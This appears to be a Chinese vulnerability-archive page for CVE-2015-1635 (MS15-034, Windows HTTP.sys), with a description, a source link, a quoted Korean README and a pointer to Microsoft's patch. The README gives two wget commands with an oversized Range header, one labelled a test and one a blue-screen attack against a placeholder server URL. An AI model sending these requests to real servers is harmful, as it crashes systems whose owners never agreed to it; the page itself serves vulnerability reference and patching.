目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CVE-2015-1635 PoC — Microsoft Windows HTTP.sys 远程执行代码漏洞

来源
https://github.com/bongbongco/MS15-034
关联漏洞
标题:Microsoft Windows HTTP.sys 远程执行代码漏洞 (CVE-2015-1635)
Description:Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 使用Microsoft IIS 6.0以上版本的Microsoft Windows的HTTP协议堆栈(HTTP.sys)中存在远程执行代码漏洞,该漏洞源于HTTP.sys文件没有正确分析经特殊设计的HTTP请求。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行
Description
CVE-2015-1635
介绍
# MS15-034
MS15-034 POC

"현재 IIS 서버 버전은 알려진 취약점(CVE-2015-1635, MS15-034)이 존재하는 취약한 버전으로 해당 취약점을 활용할 시 원격 코드 실행 혹은 블루스크린 유발 등의 공격에 당할 위험이 존재한다. 
 - 테스트 구문 : wget --header=""Range: bytes=0-18446744073709551615"" <테스트할 서버 URL>
 - 블루스크린 유발 공격 구문 : wget --header=""Range: bytes=18-18446744073709551615"" <공격할 서버 URL>

※ https://technet.microsoft.com/library/security/ms15-034
※ http://blog.alyac.co.kr/303"
"Windows Server 2012 R2 용 보안 패치를 설치한다.
https://www.microsoft.com/ko-KR/download/details.aspx?id=46500"
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →